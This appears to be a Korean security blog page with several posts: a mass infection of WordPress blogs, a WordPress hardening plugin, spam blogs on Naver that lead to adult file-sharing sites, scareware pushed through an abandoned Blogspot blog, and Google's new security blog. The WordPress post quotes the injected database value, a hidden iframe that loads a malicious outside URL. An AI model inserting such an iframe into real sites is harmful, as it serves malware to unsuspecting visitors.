워드프레스(WP, WordPress)는 외국에서 개발되어 제공되는 설치형 블로그 툴입니다. 설치형이지만, 이미 몇몇 회사에서는 Saas 형식으로 서비스되고 있으며, 국내에서도 한 곳에서 서비스 중에 있습니다.

최근, 워드 프레스로 구현된 블로그 수백여개에서 데이터베이스가 손상되는 문제점이 발견되었습니다. 공격으로 인한 피해가 최신 버전의 WP에서도 발견된 것으로 알려져 있습니다.

삽입된 코드는 SQL Injection 공격의 대표적인 유형인 <iframe>이 포함되어 있는 것으로 보아 SQL Injection 취약점을 통해 공격한 것으로 추측됩니다. 그리고, 관리자페이지(~/wp-admin/)에 로그온이 제대로 되지 않는 문제점이 보여집니다.

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

공격 당한 사이트 URL: hxxp://networkads.net/grep/

한편, 아직 공격당한 지점(Entry Point)를 알아 내지 못하고 있으며, 임시로 DB에 주입된 문자열을 제거하는 수밖에는 없다고 합니다.

출처: http://blog.sucuri.net/2010/04/mass-infection-of-wordpress-blogs-at.html

PS: 보안 제품(안티바이러스)가 설치되지 않은 경우에는 공격 당한 사이트에 방문하면 큰일납니다. 참고로, 어베스트!에서는 잡아내므로 안심해도 됩니다.

PS: 해당 문제의 원인은 관리 페이지의 권한 문제였습니다.

끝.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    캐나다의 온타리오에 위치한 SSM(http://SiteSecureMonitor.com) 회사는 유명한 블로그 솔루션인 워드프레스(WP, WordPress)에서 악성 프로그램의 감염을 예방할 수 있는 플러그인을 공개했습니다.

    이 플러그인은 워드프레스 공식 플러그인 디렉터리에서 다운로드할 수 있으며, 주요 기능은 다음과 같습니다.

    • 일반적인 보안 검사
    • WP를 최신 버전으로 업그레이드
    • 기한이 만료된 플러그인 검사
    • WP 블로그의 취약점 위험 감소
    • 로그인 페이지의 오류 메시지 제거
    • WP 버전 정보 숨기기(홈페이지, 대시보드)
    • 디렉터리 탐색 예방
    • 윈도우 라이브 라이터 차단
    • 코어 업데이트 정보 제거
    • 플로그인 업데이트 정보 제거
    • 테마 업데이트 정보 제거
    • WP의 보안 향상
    • 플러그인 디렉터리를 위한 index.php 파일 추가
    • 플러그인 폴더 숨기기
    • 관리자의 ID(admin) 변경
    • wp-config.php, wp-includes 폴더, wp-content 폴더 접근 권한 제한
    • wp-admin 폴더에 접근할 수 있는 IP 제한
    • SSM으로부터 무료 악성 프로그램 검사 제공

    자세한 사항은 아래 링크를 참고하십시오.

    플러그인: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/

     



    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      블로그는 일반 웹 사이트에 비해 검색 엔진에 등록되는 경우가 많다. 상업 사이트들은 대형 검색 엔진 회사에 등록하기 위해서는 별도의 비용을 내야 한다. 그리고, 개인 홈페이지, 동호회 등 비영리성 사이트라 하더라도 무료 등록 과정을 이용해 등록이 가능하지만 실제 등록을 해보면 십중팔구 등록이 되지 않는다. 등록되지 않는다고 알려 주는 것도 아니고, 그냥저냥 한두달 기다리다가 등록되었나 확인해 보면 보나마나 등록되지 않거나 아직 심사 조차도 되지 않는 경우가 많다.

      다행인지는 모르겠지만, 문스랩닷컴은 네이버에만 등록이 되었다. 다음, 네이트, 파란 등 다른 검색 엔진에는 등록 요청을 했지만, 아직도 감감 무소식이다. 물론 재등록 신청 한두번 하다가 그냥 포기했다.

      하여튼, 중요한 요점은 지금부터이다. 요즘 애드로거와 같이 불펌 블로그, 동영상이나 MP3 파일을 공개하는 저작권 위반 블로그 등이 문제가 되고 있는데 이 보다 더 심각한 부분은 바로 인터넷 성인물 유통 사이트로 유도하는 낚시성 블로그이다. 이에 대해 좀더 설명해 본다.

      검색 엔진에서 성인에 관련된 단어를 검색하면 미성년자 인증을 거친 후에 검색 결과를 보여 준다. 아래 그림은 네이버에서 '성인방송' 단어로 검색여 나온 결과 페이지 중 블로그 섹션에 나온 내용이다.
       

      사용자 삽입 이미지

      블로그를 잠시 살펴 보면, 이글루 서비스를 이용하고 있고, ID가 영어이지만 아무런 의미가 없고, 이를 한글 입력하는 상태로 입력해 봐도 아무런 의미가 없다. ID는 대충 만들어서 사용하는 것이다.

      또한,  블로그를 더 많이 보기 위해 '더 많은 블로그 보기'를 클릭해 보면 이러한 사이트들이 수위를 차지하고 있다.
      사용자 삽입 이미지

       이 블로그를 방문해 보면 블로그에 성인 관련 컨텐츠가 있는 것이 아니다. 이 중 하나를 클릭해 보면 바로 유료로 운영하는 파일 공유 사이트로 이동하게 된다.

      즉, 블로그가 불법 자료와 음란물을 교환하는 사이트로 이동시켜 주는 광고 매체가 되는 것이다.

       그래서, 다음(daum.net), 엠파스(empas.com), 파란(paran.com)에서도 동일하게 검색을 해보았지만 이러한 불법적인 컨텐츠가 난무하지 않고 아주 건전한(!) 블로그 들만을 검색 결과로 보여준다.

      네이버는 인터넷 광고 시장에서 꽤 높은 점유율을 가지고 있으면서 이러한 광고를 막지 못하는 기술적인 결함을 가지고 있다. 네이버에서는 스폰서링크, 파워링크, 플러스프로 등의 3단에 걸쳐 광고가 게재되고 있으며, 블로그는 사이트 바로 밑밑에 위치하고 있다. 오히려 카페보다도 우선순위(!)가 높다.

      물론 광고를 위해서라기 보다는 방문하여 검색하는 사용자에게 좀더 정확한 블로그 정보를 검색, 분류하여 제공하는 것이 올바른 방향이 아닐까 싶다. 블로그만이라도.

      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        유망한 보안 컨설턴트인 Win Schwartau의 블로그(http://securityawareness.blogspot.com)를 통해서 크루드웨어를 강제로 배포하려다 포기한 일이 있었다고 한다. 그의 블로그에서는 Malware Alarm이라고 부르는 크루드웨어를 방문자에게 설치하게끔 하도록 조작하였다.

        이 블로그는 구글에서 제공하였기 때문에 구글 측에서는 이러한 사실을 확인하고 URL을 차단하였으며, 지금은 정상적으로 복구되어 블로그 웹페이지가 열린다.
        사용자 삽입 이미지

        한편, 일부 보안 벤더들은 문제가 발생했던 Malware Alarm 무료 프로그램이 상용 버전인 프리미엄 버전을 구매하도록 교모하게 설계되어 가짜의 보안 경고를 내보인다고 주장했다. 이 소프트웨어에서 악성 프로그램이라고 진단했던 파일들은 윈도우에서 사용되던 파일이거나 정상적인 프로그램이라고 한다.

        아래 사진은 SunbeltBLOG에 올라온 스크린샷으로 위에서 언급한 블로그를 방문했을 때 나타났던 보안 경고 창 화면이다.
        사용자 삽입 이미지

        <악성 프로그램에 감염되었다고 목록을 보여주고 사용자에게 경고하는 화면>
        사용자 삽입 이미지

        사용자 삽입 이미지

        그리고, 구글의 검색 캐시 기능으로 인해 아직 검색해 보면 예전의 링크가 살아 있는 재미있는 상황이 연출되고 있다고 한다.

        문제의 원인을 이 블로그의 주인이 언급한 글에 따르면, "이미 폐쇄한 블로그로 생각하고 있었고 다른 블로그를 사용하고 있는 상태였기 때문에 이러한 경고에 대해서 무시했었다"고 합니다. 보안 컨설턴트가 이에 대해 언급한 내용은 여기를 클릭하세요.


        우리나라에는 다음, 티스토리, 네이버 등등 다양한 포탈 및 사이트에서 블로그 서비스가 제공되고 있습니다. 일부 사용자들은 이러한 블로그 서비스를 사용하면서 관리를 제대로 하지 않아 그냥 무단방치되는 경우도 많습니다. 또한, 약한(풀기 쉬운) 비밀번호로 블로그를 관리하여 해킹을 당하는 상황도 당연히 발생할 수 있습니다. 이러한 취약한 블로그를 통해 바이러스 제작자 등의 악의를 가진 사람이 이런 수단을 통해 다양한 공격을 수행한다면 막기가 그리 수월치는 않을 것이라 예상됩니다.

        따라서, 블로거들은 자신이 더 이상 운영하지 않는 경우라면 블로그를 폐쇄하거나 또는 모든 트랙백이나 링크를 달지 못하게하고, 비밀번호를 복잡하게 바꾸어 놓고 자신만이 아는 공간에 적어두는 것이 좋습니다. 또한, 블로그 서비스 업체에서는 사용자가 관리 목적으로 일정 기간동안 로그온을 하지 않는 등 무단 방치되고 있는 블로그에 대한 모니터링과 적절한 대응 조치가 필요하다고 생각됩니다.

        특히, 티스토리와 태터툴즈와 같은 블로그 설치 형태에서는 자바 스크립트를 사용할 수 있습니다. 자바 스크립트는 운영자에게는 좀더 나은 디자인과 편리성을 제공해 주지만 반대 급부로 보안상 취약점을 야기할 수도 있다는 점을 명심해야 할 것입니다.


        마지막으로 이 문제의 장본인인 Winn이 남긴 변명 의 글을 읽어 보세요.
        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          오늘 구글 블로그를 검색을 여러번 하고 있는데 갑자기 아래와 같은 화면이 나오면서

          사용이 금지되는 난감한 상황이 발생했습니다.

          내가 너무 빠른 속도로 입력하여 바이러스나 악성 프로그램으로 인식했나 보다.

          언제 풀릴련지?
          사용자 삽입 이미지

          이거 푸는거 아시는 분 댓글로 부탁드립니다.
          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus
            어느정도 규모가 큰 사이트나 포탈에서는 온라인 보안 업무를 담당하는 팀이 있기 마련인데, 이번에 구글에서도 이러한 온라인 보안에 대한 블로그를 오픈했다는 소식입니다. 블로그의 주소는  http://googleonlinesecurity.blogspot.com이며, 방문해 보면, 대부분 악성코드에 대한 자료 및 분석 보고서 등이 주종을 이루고 있습니다.

            어제 날짜(5월 21일)에 올라온 새로운 글에서는,

            구글이 생각하는, 온라인 보안에 대한 관점, 그리고 악성코드에 대한 정의 및 분포 현황, 마지막으로 안전한 웹 서핑을 위한 가이드 라인을 제시하고 있습니다.
             
            사용자 삽입 이미지

            일부 언론에서는 구글이 안티 바이러스 서비스를 새롭게 제공하려 하지 않느냐는 관측을 내놓고 있으며, 실제로 구글 팩에서는 Norton Security Scan과  같은 바이러스 백신 제품과 Spyware Doctor Starter Edition과 같은 안티스파이웨어 제품이 포함되어 있습니다.

            구글은 검색 기능에 중점을 둔 새로운 보안 서비스를 제공할지 기대됩니다.
            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus


              Web Analytics Blogs Directory